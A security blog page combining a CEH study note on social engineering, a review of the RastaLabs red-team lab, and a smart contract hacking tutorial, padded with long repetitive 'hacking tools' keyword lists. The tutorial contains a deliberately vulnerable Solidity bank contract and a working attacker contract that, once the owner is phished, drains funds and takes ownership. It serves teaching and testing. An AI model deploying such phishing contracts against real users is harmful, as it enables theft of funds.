Monday, June 5, 2023

CEH: Fundamentals Of Social Engineering


Social engineering is a nontechnical method of breaking into a system or network. It's the process of deceiving users of a system and convincing them to perform acts useful to the hacker, such as giving out information that can be used to defeat or bypass security mechanisms. Social engineering is important to understand because hackers can use it to attack the human element of a system and circumvent technical security measures. This method can be used to gather information before or during an attack.

A social engineer commonly uses the telephone or Internet to trick people into revealing sensitive information or to get them to do something that is against the security policies of the organization. By this method, social engineers exploit the natural tendency of a person to trust their word, rather than exploiting computer security holes. It's generally agreed that users are the weak link in security; this principle is what makes social engineering possible.

The most dangerous part of social engineering is that companies with authentication processes, firewalls, virtual private networks, and network monitoring software are still wide open to attacks, because social engineering doesn't assault the security measures directly. Instead, a social-engineering attack bypasses the security measures and goes after the human element in an organization.

Types of Social Engineering-Attacks

There are two types of Social Engineering attacks

Human-Based 

Human-based social engineering refers to person-to-person interaction to retrieve the desired information. An example is calling the help desk and trying to find out a password.

Computer-Based 

​Computer-based social engineering refers to having computer software that attempts to retrieve the desired information. An example is sending a user an email and asking them to reenter a password in a web page to confirm it. This social-engineering attack is also known as phishing.

Human-Based Social Engineering

Human-Based further categorized as follow:

Impersonating an Employee or Valid User

In this type of social-engineering attack, the hacker pretends to be an employee or valid user on the system. A hacker can gain physical access by pretending to be a janitor, employee, or contractor. Once inside the facility, the hacker gathers information from trashcans, desktops, or computer systems.

Posing as an Important User

In this type of attack, the hacker pretends to be an important user such as an executive or high-level manager who needs immediate assistance to gain access to a computer system or files. The hacker uses intimidation so that a lower-level employee such as a help desk worker will assist them in gaining access to the system. Most low-level employees won't question someone who appears to be in a position of authority.

Using a Third Person

Using the third-person approach, a hacker pretends to have permission from an authorized source to use a system. This attack is especially effective if the supposed authorized source is on vacation or can't be contacted for verification.

Calling Technical Support

Calling tech support for assistance is a classic social-engineering technique. Help desk and technical support personnel are trained to help users, which makes them good prey for social-engineering attacks.

Shoulder Surfing 

Shoulder surfing is a technique of gathering passwords by watching over a person's shoulder while they log in to the system. A hacker can watch a valid user log in and then use that password to gain access to the system.

Dumpster Diving

Dumpster diving involves looking in the trash for information written on pieces of paper or computer printouts. The hacker can often find passwords, filenames, or other pieces of confidential information.

Computer-Based Social Engineering

Computer-based social-engineering attacks can include the following:
  • Email attachments
  • Fake websites
  • Pop-up windows


Insider Attacks

If a hacker can't find any other way to hack an organization, the next best option is to infiltrate the organization by getting hired as an employee or finding a disgruntled employee to assist in the attack. Insider attacks can be powerful because employees have physical access and are able to move freely about the organization. An example might be someone posing as a delivery person by wearing a uniform and gaining access to a delivery room or loading dock. Another possibility is someone posing as a member of the cleaning crew who has access to the inside of the building and is usually able to move about the offices. As a last resort, a hacker might bribe or otherwise coerce an employee to participate in the attack by providing information such as passwords.

Identity Theft

A hacker can pose as an employee or steal the employee's identity to perpetrate an attack. Information gathered in dumpster diving or shoulder surfing in combination with creating fake ID badges can gain the hacker entry into an organization. Creating a persona that can enter the building unchallenged is the goal of identity theft.

Phishing Attacks

Phishing involves sending an email, usually posing as a bank, credit card company, or other financial organization. The email requests that the recipient confirm banking information or reset passwords or PINs. The user clicks the link in the email and is redirected to a fake website. The hacker is then able to capture this information and use it for financial gain or to perpetrate other attacks. Emails that claim the senders have a great amount of money but need your help getting it out of the country are examples of phishing attacks. These attacks prey on the common person and are aimed at getting them to provide bank account access codes or other confidential information to the hacker.

Online Scams

Some websites that make free offers or other special deals can lure a victim to enter a username and password that may be the same as those they use to access their work system.
The hacker can use this valid username and password once the user enters the information in the website form. Mail attachments can be used to send malicious code to a victim's system, which could automatically execute something like a software keylogger to capture passwords. Viruses, Trojans, and worms can be included in cleverly crafted emails to entice a victim to open the attachment. Mail attachments are considered a computer-based social-engineering attack.Related links

PHASES OF HACKING

What is the process of hacking or phases of hacking?
Hacking is broken up into six phases:The more you get close to all phases,the more stealth will be your attack.

1-Reconnaissance-This is the primary phase of hacking where hacker tries to collect as much as information as possible about the target.It includes identifying the target,domain name registration records of the target, mail server records,DNS records.The tools that are widely used in the process is NMAP,Hping,Maltego, and Google Dorks.

2-Scanning-This makes up the base of hacking! This is where planning for attack actually begins! The tools used in this process are Nessus,Nexpose,and NMAP. After reconnaissance the attacker scans the target for services running,open ports,firewall detection,finding out vulnerabilities,operating system detection.

3-Gaining Access-In this process the attacker executes the attack based on vulnerabilities which were identified during scanning!  After the successful, he get access to the target network or enter in to the system.The primary tools that is used in this process is Metasploit.

4-Maintaining Access-It is the process where the hacker has already gained access in to a system. After gaining access the hacker, the hacker installs some backdoors in order to enter in to the system when he needs access in this owned system in future. Metasploit is the preffered toll in this process.

5-Clearning track or Covering track-To avoid getting traced and caught,hacker clears all the tracks by clearing all kinds of logs and deleted the uploaded backdoor and anything in this process related stuff which may later reflect his presence!

6-Reporting-Reporting is the last step of finishing the ethical hacking process.Here the Ethical Hacker compiles a report with his findings and the job that was done such as the tools used,the success rate,vulnerabilities found,and the exploit process.
Related posts
  1. Install Pentest Tools Ubuntu
  2. Ethical Hacker Tools
  3. Pentest Tools Nmap
  4. Hackrf Tools
  5. Underground Hacker Sites
  6. Usb Pentest Tools
  7. Best Pentesting Tools 2018
  8. Hacks And Tools
  9. Hacker Tools Free
  10. Hack Apps
  11. Hacking Tools Github
  12. Pentest Tools For Ubuntu
  13. Hacker Hardware Tools
  14. Hacking Tools Mac
  15. Hacking Tools Online
  16. Hacker Tools Mac
  17. Hacker Tools Linux
  18. Hacker Tools Hardware
  19. Hacker Tools 2019
  20. Hacker Search Tools
  21. Hacking App
  22. Hacker Tools List
  23. Hacker
  24. Pentest Tools Github
  25. Hack Tools Mac
  26. Tools 4 Hack
  27. Nsa Hacker Tools
  28. Hack Tools For Ubuntu
  29. Hacker Tools Hardware
  30. Hack Tool Apk
  31. Hacking Tools Usb
  32. Hacking Tools And Software
  33. New Hack Tools
  34. Hacking Tools Name
  35. Pentest Tools For Mac
  36. Hacking Tools For Mac
  37. Hacking Tools Mac
  38. Pentest Tools Windows
  39. Hacker Tools Apk Download
  40. Hacking Tools Free Download
  41. Tools Used For Hacking
  42. Hack Tools
  43. How To Make Hacking Tools
  44. Pentest Box Tools Download
  45. Hacker Tools Windows
  46. What Are Hacking Tools
  47. Tools Used For Hacking
  48. Pentest Tools Bluekeep
  49. Hacking Tools Github
  50. Pentest Tools Framework
  51. Hack Tools Mac
  52. Hacker Hardware Tools
  53. Hak5 Tools
  54. Hackers Toolbox
  55. Hack Apps
  56. Hacking Tools Github
  57. Hacking Tools For Windows 7
  58. Hacking Tools
  59. Hacking Tools For Kali Linux
  60. Android Hack Tools Github
  61. Pentest Tools Windows
  62. What Are Hacking Tools
  63. Hacking Tools Mac
  64. Hacking Tools Hardware
  65. Pentest Tools Port Scanner
  66. Hacks And Tools
  67. Hacker Tools Apk
  68. Hacking Tools Windows 10
  69. What Are Hacking Tools
  70. Growth Hacker Tools
  71. Hackrf Tools
  72. Hackers Toolbox
  73. Hack Tools Pc
  74. Hacker Tools Mac
  75. Hacker Tools List
  76. Hackers Toolbox

Sunday, June 4, 2023

The RastaLabs Experience

Introduction


It was 20 November, and I was just starting to wonder what I would do during the next month. I had already left my previous job, and the new one would only start in January. Playing with PS4 all month might sound fun for some people, but I knew I would get bored quickly.

Even though I have some limited red teaming experience, I always felt that I wanted to explore the excitement of getting Domain Admin – again. I got my first DA in ˜2010 using pass-the-hash, but that was a loooong time ago, and things change quickly.
While reading the backlogs of one of the many Slack rooms, I noticed that certain chat rooms were praising RastaLabs. Looking at the lab description, I felt "this is it, this is exactly what I need." How hard could it be, I have a whole month ahead of me, surely I will finish it before Christmas. Boy, was I wrong.



The one-time fee of starting the lab is 90 GBP which includes the first month, then every additional month costs 20 GBP. I felt like I was stealing money from Rastamouse and Hackthebox... How can it be so cheap? Sometimes cheap indicates low quality, but not in this case.



My experience


Regarding my previous experience, I already took OSCP, OSCE, SLAE (Securitytube Linux Assembly Expert), and PSP (Powershell for Pentesters), all of which helped me a lot during the lab. I also had some limited red teaming experience. I had more-than-average experience with AV evasion, and I already had experience with the new post-exploit frameworks like Covenant and Powershell Empire. As for writing exploits, I knew how a buffer overflow or a format string attack worked, but I lacked practice in bypassing ASLR and NX. I basically had zero experience with Mimikatz on Windows 10. I used Mimikatz back in 2012, but probably not since. I also had a lot of knowledge on how to do X and Y, on useful tools and hot techniques, but I lacked recent experience with them. Finally, I am usually the last when it comes to speed in hacking, but I have always balanced my lack of speed with perseverance.

RastaLabs starts in 3,2,1 ...


So I paid the initial entry fee, got the VPN connection pack, connected to the lab, and got my first flag after ... 4 days. And there were 17 of them in total. This was the first time I started to worry. I did everything to keep myself on the wrong track, stupid things like assuming incorrect lab network addresses, scanning too few machines, finding the incorrect breadcrumbs via OSINT, trying to exploit a patched web service (as most OSCPers would do), etc. I was also continually struggling with the tools I was using, as I never knew whether they were buggy, or I was misusing them, or this is just not the way to get the flag. I am sure someone with luck and experience could have done this stage in 2-3 hours, but hey, I was there to gain experience.

During the lab, whenever I got stuck with the same problem for more than 30-40 hours and my frustration was running high, I pinged Rastamouse on the official RastaLabs support channel on https://mm.netsecfocus.com/. I usually approached him like "Hi, I tried X, Y, and Z but no luck", then he replied "yeah, try Y harder". This kind of information was usually all I needed, and 2-3 hours later I was back on track again. His help was always enough, but never too much to spoil the fun. The availability and professionalism of Rastamouse was 10/10. Huge multi-billion dollar companies fail to provide good enough support, this one guy here was always there to help. Amazing. I highly recommend joining the Mattermost channel – it will help you a lot to see that you are not the only one stuck with problems. But please do not DM him or the channel if you have not already tried harder.

What's really lovely in the lab is that you can expect real-world scenarios with "RastaLabs employees" working on their computer, reading emails, browsing the web, etc. I believe it is not a spoiler here that at some point in time you have to deliver malware that evades the MS Defender AV on the machine. Yes, there is a real working Defender on the machines, and although it is a bit out of date, it might catch your default payload very quickly. As I previously mentioned, luckily I had recent experience with AV evasion, so this part was not new to me. I highly recommend setting up your own Win10 with the latest Defender updates and testing your payload on it first. If it works there, it will work in the lab. This part can be especially frustrating, because the only feedback you get from the lab is that nothing is happening, and there is no way to debug it. Test your solution locally first.

Powershell Empire turned out to be an excellent solution for me, the only functionality it lacked was Port Forwarding. But you can drop other tools to do this job efficiently.

A little help: even if you manage to deliver your payload and you have a working C&C, it does not mean your task with AV evasion is over. It is highly probable that Defender will block your post-exploit codes. To bypass this, read all the blog posts from Rastamouse about AMSI bypass. This is important.

Lateral movement


When you finally get your first shell back ...



A whole new world starts. From now on, you will spend significant time on password cracking, lateral movement, persistence, and figuring out how Windows AD works.
In the past, I played a lot of CTF, and from time to time I got the feeling "yeah, even though this challenge was fun, it was not realistic". This never happened during RastaLabs. All the challenges and solutions were 100% realistic, and as the "Ars poetica" of RastaLabs states:



...which is sooooo true. None of the tasks involve any exploit of any CVE. You need a different mindset for this lab. You need to think about misconfigurations, crackable passwords, privilege abuse, and similar issues. But I believe this lab is still harder to own than 90% of the organizations out there. The only help is that there are no blue-teamers killing our shells.

About the architecture of the lab: When connecting to the lab with VPN, you basically found yourself in a network you might label as "Internet", with your target network being behind a firewall, just as a proper corporate network should be.
There are a bunch of workstations – Win10 only, and some servers like fileserver, exchange, DC, SQL server, etc. The majority of servers are Windows Server 2016, and there is one Linux server. The two sites are adequately separated and firewalled.

As time passed, I was getting more and more flags, and I started to feel the power. Then the rollercoaster experience started. I was useless, I knew nothing. Getting the flag, I was god. One hour later, I was useless.



For example, I spent a significant amount of time trying to get GUI access to the workstations. In the end, I managed to get that, just to find out I did not achieve anything with it. For unknown reasons, none of the frameworks I tried had a working VNC, so I set up my own, and it was pain.

On December 18, I finally got Domain Admin privileges. So my estimation to "finish the lab" in one month was not that far off. Except that I was far from finishing it, as I still had to find five other flags I was missing. You might ask "you already have DA, how hard could it be to find the remaining five?". Spoiler alert, it was hard. Or to be more precise, not hard, just challenging, and time-consuming. This was also a time when connections on Mattermost RastaLabs channel helped me a lot. Hints like "flag X is on machine Y" helped me keep motivated, yet it did not spoil the fun. Without hints like this, I would not have written this post but would have been stuck with multiple flags.

About exploitation


And there was the infamous challenge, "ROP the night away." This was totally different from the other 16. I believe this image explains it all:


If you are not friends with GDB, well, you will have a hard time. If you don't have lots of hands-on experience with NX bypass - a.k.a ROP - like me, you will have a hard time with this challenge. The binary exploit challenges during OSCP and OSCE exams are nowhere near as complex as this one. If you have OSEE, you will be fine. For this challenge, I used GDB-Peda and Python pwntools – check them out in case you are not familiar with them. For me, solving this challenge took about 40 hours. Experienced CTF people could probably solve it in 4 hours or less.

Conclusion


I would not recommend taking this lab for total beginners *. I also do not recommend doing the lab if you only have limited time per day, which is especially true if you are working on your home computer. I probably would have saved hours or even days if I had set up a dedicated server in the cloud for this lab. The issue was that the lab workstations were rebooted every day, which meant that I always lost my shells. "Persistence FTW", you might say, but if your C&C is down when the workstation reboots, you are screwed. "Scheduled tasks FTW", you might say, but unless you have a strict schedule on when you start your computer, you will end up with a bunch of scheduled tasks just to get back the shell whenever you start your computer. Day after day I spent the first hour getting back to where I had been the day before. And I just figured out at the end of the lab why some of my scheduled tasks were not working ...

I would be really interested to see how much time I spent connected to the lab. Probably it was around 200–250 hours in total, which I believe is more than I spent on OSCP and OSCE combined. But it was totally worth it. I really feel the power now that I learned so many useful things.

But if you consider that the price of the one-month lab is 20 GBP, it is still a very cheap option to practice your skills. 
* It is totally OK to do the lab in 6 months, in case you start as a beginner. That is still just 190 GBP for the months of lab access, and you will gain a lot of experience during this time. You will probably have a hard time reaching the point when you have a working shell, but it is OK. You can find every information on Google, you just need time, patience and willingness to get there.

Anyway, it is still an option not to aim to "get all the flags". Even just by getting the first two flags, you will gain significant experience in "getting a foothold". But for me, not getting all the flags was never an option.



If you are still unconvinced, check these other blog posts:

Or see what others wrote about RastaLabs.


Footnote


In case you start the lab, please, pretty please, follow the rules, and do not spoil the fun for others. Do not leave your tools around, do not keep shared drives open, do not leave FLAGs around. Leave the machine as it was. If you have to upload a file, put it in a folder others won't easily find. This is a necessary mindset when it comes to real-world red teaming. Don't forget to drop a party parrot into the chat whenever you or someone else gets a new flag. And don't forget:
OSCP has no power here. Cry harder!

I will probably keep my subscription to the lab and try new things, new post-exploit frameworks. I would like to thank @_rastamouse for this great experience, @superkojiman for the ROP challenge. Hackthebox for hosting the lab with excellent uptime.
As for @gentilkiwi and @harmj0y, these two guys probably advanced red-teaming more than everyone else combined together. pwntools from @gallopsled was also really helpful. And I will be forever grateful to Bradley from finance for his continuous support whenever I lost my shells.

More information


  1. Wifi Hacker Tools For Windows
  2. Install Pentest Tools Ubuntu
  3. Hacking Tools For Windows Free Download
  4. Hacker
  5. Pentest Tools Tcp Port Scanner
  6. Hacker Tools For Pc
  7. Hacking Tools For Pc
  8. Hacker Hardware Tools
  9. Underground Hacker Sites
  10. Pentest Tools Alternative
  11. Hack Tools 2019
  12. Black Hat Hacker Tools
  13. Pentest Tools Free
  14. Growth Hacker Tools
  15. Hacking Tools For Kali Linux
  16. Hacking Tools Hardware
  17. Hack And Tools
  18. Hacker Security Tools
  19. Hacker Tools For Ios
  20. Hack Tools
  21. Hacking Tools Free Download
  22. Hacking Tools 2019
  23. Top Pentest Tools
  24. Hack Tools
  25. Hacker Tools Free
  26. Usb Pentest Tools
  27. Hacker Tools Online
  28. Hacking Tools Online
  29. What Are Hacking Tools
  30. Game Hacking
  31. Pentest Tools Tcp Port Scanner
  32. Hacking Tools For Mac
  33. Hack Rom Tools
  34. Pentest Tools Port Scanner
  35. Pentest Tools Find Subdomains
  36. Hacking Tools Windows
  37. Hacking Tools Windows 10
  38. Hacking Tools For Kali Linux
  39. Termux Hacking Tools 2019
  40. Hack Tools
  41. Hacking Tools Usb
  42. Pentest Reporting Tools
  43. Pentest Recon Tools
  44. Hacking Tools 2020
  45. Pentest Reporting Tools
  46. Pentest Tools For Windows
  47. Hacking Tools Mac
  48. Hacking Tools
  49. Best Hacking Tools 2019
  50. Pentest Tools For Ubuntu
  51. New Hacker Tools
  52. Hack Tools
  53. Hacking Tools For Mac
  54. Pentest Tools For Android
  55. Pentest Tools
  56. Github Hacking Tools
  57. Hacking App
  58. Hacker Tools For Ios
  59. Hacking Tools For Mac
  60. Bluetooth Hacking Tools Kali
  61. How To Hack
  62. Pentest Tools
  63. Hacker Tools 2019
  64. Game Hacking
  65. Hack Tools For Pc
  66. Hacking Tools For Beginners
  67. Hacker Tools Github
  68. Hacking Tools Name
  69. Pentest Automation Tools
  70. Pentest Tools List
  71. Best Pentesting Tools 2018
  72. Pentest Tools Tcp Port Scanner
  73. Hack Tools Online
  74. Tools Used For Hacking
  75. Growth Hacker Tools
  76. Underground Hacker Sites
  77. Hacker Tools 2019
  78. Install Pentest Tools Ubuntu
  79. Easy Hack Tools
  80. Blackhat Hacker Tools
  81. Hacking Tools Kit
  82. Hacks And Tools
  83. Easy Hack Tools
  84. Pentest Tools
  85. Hacking Tools Online
  86. Nsa Hacker Tools
  87. Hack Tools Online
  88. Pentest Tools Download
  89. Free Pentest Tools For Windows
  90. Game Hacking
  91. Hacking Tools Online
  92. Pentest Tools For Android
  93. Hacking Tools Windows 10
  94. Android Hack Tools Github
  95. Pentest Tools Windows
  96. Hacker Tools Github
  97. Growth Hacker Tools
  98. Hack Tools For Pc
  99. Pentest Tools Framework
  100. How To Make Hacking Tools
  101. Tools For Hacker
  102. Pentest Tools
  103. What Are Hacking Tools
  104. Pentest Tools For Mac
  105. Hack Tools
  106. Hack Tools Pc
  107. Pentest Tools Url Fuzzer
  108. Hack Tools Online
  109. Kik Hack Tools
  110. Hacking Tools Usb
  111. Pentest Tools Subdomain
  112. Best Hacking Tools 2019
  113. Usb Pentest Tools
  114. Pentest Tools For Windows
  115. Pentest Tools Subdomain
  116. Wifi Hacker Tools For Windows
  117. Pentest Tools Apk
  118. Hacker Tools
  119. Hacking Tools And Software
  120. Pentest Tools For Windows
  121. New Hack Tools
  122. Hacker Tools Free
  123. Hacker Tools
  124. Hacking Apps
  125. Pentest Tools
  126. Hacker Tools
  127. Hacker Tools For Pc
  128. Github Hacking Tools
  129. Hack Tools
  130. Hacking Tools Name
  131. Pentest Tools Online

Smart Contract Hacking Chapter 6 - Phishing Users With Malicious DAPS Via TX.Origin


Authorization on a smart contract can sometimes be a tricky endeavor. There are many things that are easily coded incorrectly, for example public functions, unpublished functions, delegate calls and tx.origin validations. If any of these are implemented incorrectly, then contracts are often left vulnerable to both direct and indirect attacks.

In this case, we will be talking about tx.origin which is an indirect attack method an attacker can utilize to bypass authorization based on the nuance of what is actually checked vs what the developer may think is checked when implementing require statements with tx.origin for authorization.

There are two different ways to check the address of who is making a call to a contract.

ü  Msg.sender

ü  Tx.Origin

 

While both of these could produce the same output when directly calling a contract, they may differ when there is another contract in the middle of the transaction. For example, if you play an online game which calls another contract to handle a payout transaction. When using a check with msg.sender, the winning payout would go to the games address that called the payout contract.

If the same address was checked with tx.origin on the payout contract, it would go all the way back to the original users address that processed the payout transaction on the game rather than the game contract making the call.

 

Man In the Middle Via tx.origin

This type of check is often misused when checking validation for authorization on smart contracts. When a tx.Origin check is used instead of msg.sender, this can leave a contract open to a man-in-the-middle (MITM) attack vector. Let's take a look at a visual representation of an attack, which will help put this into perspective. Then we will look at some code that implements this functionality.

 

In the below image we have:

ü  A user on the left

ü  An attacker's contract in the middle

ü  A target contract on the right

 


 

  

If the attacker were to call the target contract directly his authorization would be checked based on his personal address value regardless if the check is being performed via msg.sender or tx.orgin.  However, if the attacker created his own contract that called the target contract, the attacker could run a phishing campaign and social engineer the user into running functionality on the attacker's contract.

For example, sending a user to a game or accepting a payment for services and proxying the request to the target contract. If the user is social engineered into using the attackers contract, the attackers contract would make a transaction call to the target contract with which originates from the user's address via tx.origin. 

This is the exact point where things can go sideways.  If the target contract processes the transaction via msg.sender then the attackers contract would authorized as the attackers contract address. However, if the contract checks authorization via tx.origin than the attacker is accessing the target as the victims address and can bypass any authorization checks and simply process functionality as the victim user, to the attackers benefit.

This attack could be used to liquidate a user's account with a transfer function from the authorized user to the attacker's account. Or accessing forbidden functionality such as a Self-Destruct function linked to administrator only validation, or perhaps updating admin functionality to provide the attacker with full access to the contract. Much like social engineering in a standard network penetration test, this could be a wide scale phishing campaign to effect all standard users, or a spear phishing attack targeting an administrative user.

Regardless of the motivations of the attacker, there are many bad things that can happen. So let's take a look at a very simple example of tx.origin just so you see the difference between msg.sender and tx.origin.  We want to make sure you fully understand how this functionality is actually working so you can spot it during your testing before we exploit it.

 

Simple tx.origin Example Walkthrough:

Action Steps:

ü  Type out the following 2 contracts into Remix

ü  Deploy the HelloWorldTXOrigin contract first and copy its address value

ü  Place the address value in the proper location within CallHello contract and deploy it

ü  Review the code within CallHello and its usage of address validation

ü  Review the calls into the contract from HelloWorldTXOrigin that are effected by the address validation

ü  Try to reason based on what you learned above how this works and where and what the issues could be

 

 

1.    pragma solidity ^0.6.6;
2.   
3.    contract HelloWorldTXOrigin {
4.       
5.      function return_TX_Address() public returns(address){
6.           address myaddress = tx.origin;
7.           return myaddress; 
8.      }
9.      
10.   function return_MSG_Address() public returns(address){
11.       address myaddress = msg.sender;
12.         return myaddress; 
13.   }
14. }    

 

The code above for HelloWorldTXOrigin is extremely simple. All the code does is set a variable on lines 6 and 11 to the address calling the function and returns the value.  On line 6 it uses the tx.origin value and on line 11 it uses the msg.sender.

Now take a look at the following contract which calls the above contract to illustrate the difference between msg.sender and tx.origin values.  

 

1.    pragma solidity ^0.6.6;
2.   
3.    interface targetInterface {
4.      function return_TX_Address() external returns(address); 
5.      function return_MSG_Address() external returns(address);
6.    }
7.   
8.    contract Call_Hello {
9.      targetInterface helloInterface = targetInterface(ADD_Address_Here);
10. 
11.   function myTX ()  public returns (address){
12.        return helloInterface.return_TX_Address();
13.   }
14.    
15.   function myMSG ()  public returns (address){
16.        return helloInterface.return_MSG_Address();
17.   }
18.}

 

The Call_Hello contract above calls the HelloWorld contract via an interface defined on line 3 and initialized to a variable named helloInterface on line 9.

All this contract does is call functions from HelloWorld on lines 12 and 16 and returns the address values of tx.sender or msg.sender. Presumably this would be a random user that you social engineered into using this contract.

Action Steps:

ü  Select the first account in the dropdown list

ü  Compile and deploy HelloWorldTXOrigin.sol contract via Remix:

ü  Copy the address of the HelloWorldTXOrigin.sol contract

ü  Paste that address value into the target interface address placeholder

ü  Select the second account in the dropdown list

ü  Compile and deploy Call_Hello.sol

ü  Select any other account to simulate the victim account calling the attackers Call_Hello contract

ü  After each is pressed review the transaction output address and walk through in your head what you are reviewing before moving on.

 

If you performed the above action steps you would notice something similar to the following. First, I deploy my target contract with account one, which got deployed to the address:

 

ü  0xdCDB4db4a54F689ECC486d8BAcC08Cde4AC7FcA8

 



Next, I replace the address in the following line of the attackers phishing contract Call_Hello with the address from above, using the copy button to the right of the address in the above screenshot:

 

targetInterface helloInterface = targetInterface(0xdCDB4db4a54F689ECC486d8BAcC08Cde4AC7FcA8);

 

I then switch to Account two, and deploy the attackers phishing contract. This gives us the attackers contract address:  

 

ü  0x4e1426490dBfBa9110064fb912fe7221074cC0c9

 



 

Finally, I switch to the third account, ( my social engineered victim account) with the address:

 

ü  0x00bff3B21f6924D6e639Ce60e4Dac62Ec2c21269

 

 


 

If I then click the myMSG button on the attackers contract I should get the attackers address as the msg.sender resolves the address calling the contract. In this case I call the attackers contract but the attacker's contract is actually making the call to the target contract, so the msg.sender is the attackers contract even though or victim is the one clicking the button.  Indeed, this is true, shown below, the attackers contract address is returned when validated with msg.sender.

___________________________________________________________________________________

 

decoded output     {

 "0": "address: 0x4e1426490dBfBa9110064fb912fe7221074cC0c9"

}

___________________________________________________________________________________

 

Next I click the myTX button which should return the victims address from the 3rd account as the tx.origin check returns the original calling account of the user, not the attackers contract making the call. Indeed, this is true, shown below, the victims contract address is returned when validated with tx.origin.

___________________________________________________________________________________

 

decoded output     {

"0": "address: 0x00bff3B21f6924D6e639Ce60e4Dac62Ec2c21269"

}

___________________________________________________________________________________

  

I hope that clears up any confusion as to the difference between both msg.sender and tx.origin.  We will now take a look at a more comprehensive example with a bit of vulnerable code to put this into context and show how to bypass some controls using this attack method.

Action Steps:

ü  Review this code prior to reading the explanation.

ü  What is wrong with the logic in this contract?

ü  What would your path of exploitation be?

ü  What would the impact of this attack be?

ü  Type this code into remix and follow along with the walk through


Simple Example Video Walk Through: 


 

Vulnerable TX.Origin Example Walkthrough:

1.    pragma solidity ^0.6.6;
2.   
3.    contract BankOfEther {
4.      address owner;
5.      mapping (address =>uint) balances;
6.       
7.      constructor() public {
8.        owner = msg.sender;
9.      }
10.    
11.  function deposit() public payable{
12.    balances[msg.sender] = balances[msg.sender]+msg.value;     
13.   }
14.    
15.  function transferTo(address payable to, uint amount) public payable{
16.      require(tx.origin == owner);
17.      to.transfer(amount);
18.  }
19.    
20.  function changeOwner(address newOwner) public{
21.      require(tx.origin == owner);
22.      owner = newOwner;
23.                 }
24.    
25.  function kill() public {
26.      require(msg.sender == owner);
27.      selfdestruct(msg.sender);
28.  }
29.}

 

Above is an example of a contract which uses tx.origin to check for user authorization. On lines 16 and 21 you will see that in order to transfer contract funds or change the owner of the contract, you need to be the owner of the contract. This check uses the tx.origin value. The owner which is checked is set in the constructor on line 8 when the contract is deployed.

Also note that there is a kill function at line 25 using Solidity's built-in self-destruct function. This function will destroy the contract making it unusable and send any remaining contract ether to the address specified. This function is using authorization checks against the owner via the msg.sender rather than the tx.origin.

 

Action steps to familiarize yourself with the contract:

ü  Type the code above into Remix and deploy it

ü  Change the value field to 10 and the denomination to ether

ü  Deposit the 10 ether with the deposit function.

ü  Switch accounts and try to run changeOwner, Kill and transferTo functionality

ü  Try the same thing with the original account

ü  Try to deposit funds again

 

In your action steps and exploration of the contract you will notice that these functions do not run properly with the second account as you are not the owner of the contract when using the second account. You will also notice that these did run properly when used with the first account that deployed the contract as this user was set to the owner when deployed. You will also notice that when you ran the kill function it rendered the contract unusable and your funds were returned to your account from the initial deposit.

Now that we are familiar with the contracts functionality and we know that it is dangerously checking authorization using tx.origin  on both the transferTo and changeOwner functions. What would we do to attack this?

In order to formulate an attack, we will use a standard phishing style attack via social engineering. Exactly the same as if we were contracted to perform social engineering on a penetration test, however the malicious site that we send our victim communicates with our malicious smart contract on the backend as a proxy into the vulnerable contract for example using a decentralized web application (DAP) that makes web3.js calls. We used web3.js calls in an earlier chapter when directly making calls to a contract.

How we attack this would depend on our motivations as an attacker. We could simply trick the contract owner into running functionality on our malicious contract which then transfers all of the funds out of the contract to the attacker's wallet. The owner may not even notice this attack took place until he had issues with account balances. He may not even realize when and how it happened depending on how you orchestrate your attack. We could also take control of the whole contract and become the owner of the contract which would provide us with unfettered access to sensitive functionality at any time.

Let's take a look at a malicious smart contract that could transfer out all of the funds and additionally give use full administrative control of the contract. Generally, in a live attack scenario we would code a pretty looking DAP page around this attacker's contract with Web3.js much like in a phishing engagement.

1.  pragma solidity ^0.6.6;
2.   
3.  interface targetInterface {
4.  function transferTo(address payable to, uint amount)  payable external;
5.  function changeOwner(address newOwner) external;
6.  function kill() external;
7.  }
8.   
9.  contract PhishingBankOfEther {
10.  address payable attackerAddress;
11.    
12.  constructor() public {
13.     attackerAddress = msg.sender;
14.  }
15.    
16.  targetInterface bankInterface = targetInterface(ADDRESS);
17. 
18.  function test () payable public {
19.     bankInterface.transferTo(attackerAddress, 1 ether);
20.     bankInterface.changeOwner(attackerAddress);
21.  }
22.}

 

Most of this contract above is setting up the target interface, so this should be pretty easy to follow if you read through the section on Reentrancy where we setup an interface in our attacking contract.  But just to review an interface is a way that we can call functions from another contract via its address and function names. For example, on lines 3-6 we create an interface and simply copy paste the function definitions from our target contract into our interface definition. That's it.  And then we take that target interface we created and point it at the address of the target contract on line 16 with the name bankInterface. That is really the only thing we are doing for 75% of this contract. Nothing new or scary.

At this point we can use the bankInterface variable to access functionality within the target contract from our attacking contract.  Pretty simple right?  

Now the actual meat of this attacking contract is within lines 18-20 where we have a test function which calls the transferTo and changeOwner functions we do not have access to as a non-owner.

 

Action Steps:

ü  Re-deploy the target contract with your first account on remix

ü  Deposit 10 ether into the target contract

ü  Copy the address of the target contract via the copy button on the right side of the deployed contract

ü  Within the attacking contract replace the ADDRESS with the copied address from the target

ü  Switch to the second account in your list of accounts

ü  Deploy this contract and you will see a single function named test

 

Now as before with your attacker's account you cannot run functionality which performs authorization checks because the attackers address is not the owner, so running this test function which changes the owner and sends 1 ether will not work from the second account.  However, instead of our attacker running this functionality directly, the attacker would phish the Owner located on account one. The phish would use the attacker's contract which would perform the actions as the owner due to the incorrect check using tx.origin.

 

Action steps:

ü  Switch to the first account

ü  Try using the transfer function to verify that its working and that you're the owner

ü  Run the test function from the attacker's contract with account 1.

ü  Now try to use that send function again. Did it work?

ü  Try to use the kill function. Did that work?

ü  Now switch to the attackers account and use the send function. Did that work this time?

ü  Now kill the contract from the attackers account. What happened?

 

So, what happened when you used the test function from the attacker's contract?

The test function called the changeOwner and transferTo functions from the attacker's contract. But not as the attacker's address because authorization was checked via the Tx.origin which is the person calling the attacker's contract (account 1), not the attacker's contract address (account 2).

Even with the phishing contract if we were to call the kill function from the attacker's contract it would have failed because it uses the msg.sender. So, in order to execute kill, we had to use changeOwner and become the owner of the contract prior to calling the kill function.

As a result of phishing the owner into using the attacker's contract, the attacker is now the owner of this target contract. As such, the attacker actually can call the kill function directly without any issues and the original owner has been locked out of administrative functionality. 

Now in real life we, have a couple different options for attacking this user via a phishing attack over chat, email or even the phone.

Attack Options:

  1. Send a user a link to a website, perhaps a game they can play on Ethereum etc
  2. Sell the owner something and get the owner to send you any amount of Ether to your contract address. At this point you would have a fall back function which performs actions on the user's behalf simply by sending funds to our contracts account address and having the fallback function auto execute functionality with the owner's address.

 

I hope all of this makes sense. If you got stuck at any point during this walkthrough make sure to check out the video for a walkthrough of the lab and additional attack options.  

 
